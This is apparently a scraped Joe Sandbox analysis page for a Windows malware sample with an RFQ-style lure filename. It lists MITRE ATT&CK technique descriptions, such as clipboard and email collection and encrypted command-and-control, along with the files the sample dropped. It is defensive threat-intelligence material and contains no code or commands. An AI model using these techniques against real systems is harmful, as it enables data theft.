Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ-SulselBarruII2-COALCOMMLDOC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\ukases.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsjlhnjp.qwc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qr5yvafi.dw1.ps1

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Behandlingsmaal.sac

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Kliniklokalernes.sun

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Potatory.rea

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe:Zone.Identifier

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Reluktansernes.Ove71

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\teda.txt

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

Windows Analysis Report
RFQ-SulselBarruII2-COALCOMMLDOC.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre